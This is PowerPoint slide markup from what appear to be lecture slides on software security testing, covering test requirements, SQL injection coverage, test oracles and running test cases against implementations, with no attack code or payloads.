            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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2001)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Time </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>market</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-180" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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pressure</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" marR="5080" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Lack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of in depth </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>knowledge </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>among related </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>professionals on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-360" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>how  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>alter expected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-27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behaviors</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="187960" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1705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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>misunderstood </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>task </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(McGraw </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>et</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-44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al.  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2004)</a:t>
            </a:r>
            <a:endParaRPr sz="24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505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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>port scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-280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2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr sz="20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480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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Examining </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>policies</a:t>
            </a:r>
            <a:endParaRPr sz="20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040633" y="645668"/>
            <a:ext cx="352171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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>testing</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>steps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43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93902" y="1401889"/>
            <a:ext cx="6381750" cy="3945890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590"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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requirement</a:t>
            </a:r>
            <a:endParaRPr sz="20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450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1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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aspect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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="1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program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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want</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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test?</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="69444"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Special</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>classes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="3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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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may</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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cause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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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breaches</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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1800" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>these </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are introduced </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-254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programs?</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="69444"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Lack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-12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validation</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="69444"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>APIs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(SQL query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15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library)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="245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B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2000" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-110" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>coverage</a:t>
            </a:r>
            <a:endParaRPr sz="20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229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1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Does</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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test</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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suite</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-75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reveal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-55" dirty="0"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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="18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219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1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>coverage </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>program </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-27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testing</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="69444"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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test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suite</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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should</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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reveal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-2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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SQLI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="18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683255" y="769111"/>
            <a:ext cx="469328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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>testing </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>steps</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>(cont.)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44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17702" y="1459442"/>
            <a:ext cx="8344534" cy="316103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425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55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-45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are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generated </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>program </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:endParaRPr sz="24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265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15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E.g., Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-90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code</a:t>
            </a:r>
            <a:endParaRPr sz="20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240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35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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each</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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test</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-11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case?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="926465" marR="238760" lvl="2" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2160"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="515"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pP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Response</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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messages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>identify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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presence</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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absence</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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of  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="27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55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>cases </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>run against</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-38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implementations</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" marR="5080" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>presence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>confirmed </a:t>
